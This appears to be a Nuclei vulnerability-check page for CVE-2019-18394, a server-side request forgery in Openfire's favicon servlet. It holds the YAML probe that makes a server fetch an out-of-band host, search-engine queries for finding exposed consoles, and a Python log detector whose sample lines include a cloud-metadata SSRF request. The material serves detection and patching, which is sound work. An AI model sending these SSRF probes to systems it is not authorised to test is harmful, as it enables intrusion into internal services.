Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
ID: CVE-2019-18394
Severity: critical
Author: pdteam
Tags: cve,cve2019,ssrf,openfire,oast,igniterealtime
Description
Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
YAML Source
id: CVE-2019-18394

info:
  name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
  author: pdteam
  severity: critical
  description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
  reference:
    - https://swarm.ptsecurity.com/openfire-admin-console/
    - https://github.com/igniterealtime/Openfire/pull/1497
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18394
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18394
    cwe-id: CWE-918
    epss-score: 0.70889
    epss-percentile: 0.98041
    cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: igniterealtime
    product: openfire
    shodan-query:
      - http.title:"openfire admin console"
      - http.title:"openfire"
    fofa-query:
      - title="openfire"
      - title="openfire admin console"
    google-query:
      - intitle:"openfire"
      - intitle:"openfire admin console"
  tags: cve,cve2019,ssrf,openfire,oast,igniterealtime

http:
  - method: GET
    path:
      - "{{BaseURL}}/getFavicon?host=http://oast.fun/"

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Interactsh Server')"
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100befba9a9ad77698ec07213ab51f8c3a8a2c18c7c328b00d9c60c6c3b3640ae15022019003c9f432deb1e617ad9e8d0b18512a10cf469854e2e5ff5bb6ed680d66864:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the issue by requesting /getFavicon with a host parameter that points at an out-of-band (OAST) server and matching the "Interactsh Server" text in the proxied response. It is run with the Nuclei tool against a target URL:
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-18394.yaml"
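The template above probes the vulnerable endpoint from the outside; a defender will usually also want to spot this pattern in existing web-server logs. The following is an added detection example, not part of the template or of Openfire, that scans constructed access-log lines (common log format, an assumption about the deployment) for /getFavicon requests whose host parameter is an absolute URL or an internal address:

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2019:12:00:01 +0000] "GET /getFavicon?host=http://oast.fun/ HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2019:12:00:02 +0000] "GET /getFavicon?host=http%3A%2F%2F169.254.169.254%2Flatest%2F HTTP/1.1" 200 88
198.51.100.7 - - [10/Oct/2019:12:00:03 +0000] "GET /getFavicon?host=example.org HTTP/1.1" 200 1024
198.51.100.7 - - [10/Oct/2019:12:00:04 +0000] "GET /login.jsp HTTP/1.1" 200 2048
203.0.113.5 - - [10/Oct/2019:12:00:05 +0000] "GET /getFavicon?host=10.0.0.12 HTTP/1.1" 200 40
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify_host_param(value):
    """Return a reason string if the favicon host parameter looks like SSRF abuse, else None."""
    value = unquote(value)
    # The unpatched servlet accepted any value; a full URL with a scheme is the
    # shape the Nuclei template uses (host=http://oast.fun/).
    if re.match(r'^[a-zA-Z][a-zA-Z0-9+.-]*://', value):
        target = urlsplit(value).hostname or ""
        reason = "absolute URL in host parameter"
    else:
        target = value.split('/')[0].split(':')[0]
        reason = None
    # Internal, loopback and link-local (cloud metadata) addresses are the
    # SSRF destinations most worth alerting on.
    try:
        ip = ipaddress.ip_address(target)
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            return f"internal address {ip}" + (f" ({reason})" if reason else "")
    except ValueError:
        pass
    return reason


def find_ssrf_attempts(log_text):
    """Return (src_ip, timestamp, host_param, reason) for suspicious /getFavicon requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/getFavicon":
            continue
        for host in parse_qs(parts.query).get("host", []):
            reason = classify_host_param(host)
            if reason:
                hits.append((m.group("src"), m.group("ts"), unquote(host), reason))
    return hits
```

Running find_ssrf_attempts(SAMPLE_LOG) flags three of the five constructed lines; the plain hostname request to example.org is left alone, so a benign favicon lookup does not fire the rule.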